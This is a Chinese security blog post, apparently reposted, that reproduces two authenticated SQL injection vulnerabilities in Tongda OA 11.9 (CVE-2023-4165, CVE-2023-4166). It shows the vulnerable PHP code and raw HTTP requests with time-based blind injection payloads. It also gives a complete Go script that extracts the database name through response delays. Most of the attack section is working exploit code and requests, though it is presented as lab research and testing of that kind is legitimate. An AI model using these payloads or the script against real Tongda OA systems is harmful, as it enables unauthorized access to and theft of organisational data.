通达OA俩SQL注入复现与分析

渗透技巧 1年前 (2023) admin
1,257 0 0

前言

又是各种day的poc满天飞,我今天挑个通达OA的POC来验证一下其真实性,在此写下文章来分析记录一下。

声明:**文章中涉及的内容可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

环境搭建

下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.9.exe

通达OA俩SQL注入复现与分析

服务启动

通达OA俩SQL注入复现与分析

利用admin账号成功登录,密码默认为空

通达OA俩SQL注入复现与分析

漏洞分析(CVE-2023-4165

根据网传的poc,直接来看/general/system/seal_manage/iweboffice/delete_seal.php文件

<?php
require_once "inc/auth.inc.php";
include_once "inc/header.inc.php";
include_once "inc/utility_all.php";
$CUR_TIME = date("Y-m-d H:i:s", time());
$DELETE_STR = rtrim($DELETE_STR, ",");
$query = "delete from office_seal WHERE ID IN ($DELETE_STR)";
exequery(TD::conn(), $query);
header("location:manage.php?start=$start");
?>

实现的功能是从数据库中删除指定的记录。前面三句是包含其它文件进来。然后第四句开始是创建了一个名为 DELETE_STR 变量进行处理,使用rtrim()  函数去掉末尾的逗号(,)。然后是构造了一个 SQL 查询语句,使用 $DELETE_STR 中的值作为 ID 列的筛选条件。

通达OA俩SQL注入复现与分析

调用 exequery() 函数执行 SQL 查询;使用 header() 函数将请求重定向到另一个页面。

exequery(TD::conn(), $query);
header("location:manage.php?start=$start");

分析到这里的时候,很明显的一个SQL语句拼接,确认存在SQL注入。

但是我们看到前面是把inc/auth.inc.php包含进来了的,也就是说需要有登录后的权限才能执行下面的删除操作。

通达OA俩SQL注入复现与分析

没登录的时候,直接访问则会显示“用户未登录,请重新登录!”

通达OA俩SQL注入复现与分析

我们登录之后进行测试。发现是印章日志查询的功能。

通达OA俩SQL注入复现与分析

尝试进行注入,试一下有没有过滤sleep

http://192.168.88.131/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1) and if(1 =1,sleep(5),1) AND (1) = (1

通达OA俩SQL注入复现与分析

分析一下看到在inc/conn.php中做了过滤。

调用链为:

inc/auth.inc.php(3)--->inc/session.php(77)--->inc/conn.php---(sql_injection)

在inc/conn.php的sql_injection方法过滤了常用的SQL注入函数

通达OA俩SQL注入复现与分析

尝试使用网传的poc进行请求

GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(83)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 192.168.88.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: Hm_lvt_74ecab41a4d1845b3fab38f72ed0db35=1679966090; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=3d564868; PHPSESSID=po5cp18o8mov6bk99cd338a7e1
Cache-Control: max-age=0

使用DATABASE获取当前数据库名称,char(84)是ASCII码的T,看到有稍微延迟(推测是SQL语句匹配运行造成的)

通达OA俩SQL注入复现与分析

char(83)未延迟

通达OA俩SQL注入复现与分析


漏洞分析(CVE-2023-4166

这个漏洞其实和上面的那个差不多,只是漏洞点的位置不同,我们也来简单的看一下吧。

/general/system/seal_manage/dianju/delete_log.php

<?php
require_once "inc/auth.inc.php";
include_once "inc/header.inc.php";
if (substr($DELETE_STR, -11) == ",") {
 $DELETE_STR = substr($DELETE_STR, 0, -1);
}
$query = "delete from SEAL_LOG WHERE LOG_ID IN ($DELETE_STR)";
exequery(TD::conn(), $query);
header("location:log.php?start=$start");
?>

简单分析看了下,大概功能是从”SEAL_LOG”表中删除指定的日志。根据传入的参数$DELETE_STR,该脚本构建了一个DELETE语句,并使用exequery()函数执行该查询。最后还来了个重定向,和上面的那段代码也是非常相似的。也包含了inc/auth.inc.php

通达OA俩SQL注入复现与分析

我们就直接上POC了,POC和上面一模一样。

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 192.168.88.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: Hm_lvt_74ecab41a4d1845b3fab38f72ed0db35=1679966090; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=4fb6c477; PHPSESSID=brpsncea78tf3qv8jgpdr69d20
Cache-Control: max-age=0

延迟两秒多

通达OA俩SQL注入复现与分析

延迟一秒左右

通达OA俩SQL注入复现与分析

工具编写

根据上面分析的特性,当遇到正确的字符的时候延迟的时间会比错误的字符多一些。分别是两秒多,和秒左右。

使用go编码的简单脚本,测试的POC是用于枚举当前所使用的数据库名称。

package main

import (
 "fmt"
 "net/http"
 "strings"
 "time"
)


func main() 
{

 url := "http://192.168.88.131/general/system/seal_manage/dianju/delete_log.php"                                                                                     // 目标网站的URL
 delay := 2                                                                                                                                                          // 延迟时间,单位为秒
 cookieValue := "Hm_lvt_74ecab41a4d1845b3fab38f72ed0db35=1679966090; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=3d564868; PHPSESSID=po5cp18o8mov6bk99cd338a7e1" // 替换为有效的Cookie值

 characters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()+-" // 可能的字符集

 result := ""
 for i := 1; i <= 30; i++ { // 假设字符的最大长度为30
  found := false
  for _, char := range characters {
   payload := fmt.Sprintf("1) and (substr(DATABASE(),%d,1))=char(%d) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1", i, int(char)) // 构造payload
   //print(payload, "n")
   req, err := http.NewRequest("GET", url, nil)
   if err != nil {
    fmt.Println("创建请求失败:", err)
    return
   }

   // 使用分号分隔的每个Cookie项
   cookieItems := strings.Split(cookieValue, "; ")
   for _, item := range cookieItems {
    itemSplit := strings.SplitN(item, "="2// 按照等号(=)分隔键值对
    if len(itemSplit) == 2 {
     cookie := &http.Cookie{
      Name:  itemSplit[0],
      Value: itemSplit[1],
     }
     req.AddCookie(cookie)
    }
   }

   req.URL.RawQuery = "DELETE_STR=" + payload //构建请求,其DELETE_STR是本次的注入参数

   startTime := time.Now()
   resp, err := http.DefaultClient.Do(req)
   if err != nil {
    fmt.Println("发送请求失败:", err)
    return
   }
   defer resp.Body.Close()

   endTime := time.Now()
   responseTime := endTime.Sub(startTime)

   if responseTime >= time.Duration(delay)*time.Second {
    result += string(char)
    found = true
    break
   }
  }

  if !found {
   break
  }
 }

 fmt.Println("Database: " + result)
}

CVE-2023-4166获取当前数据库名称

通达OA俩SQL注入复现与分析

CVE-2023-4165获取当前数据库名称

通达OA俩SQL注入复现与分析

查看数据库的配置,结果正确

通达OA俩SQL注入复现与分析

总结

1.两个漏洞很相似

2.漏洞点很容易看到,但想要利用起来还得进行更深入的绕过。


原文始发于微信公众号(pentest):通达OA俩SQL注入复现与分析

版权声明:admin 发表于 2023年8月10日 下午6:08。
转载请注明:通达OA俩SQL注入复现与分析 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...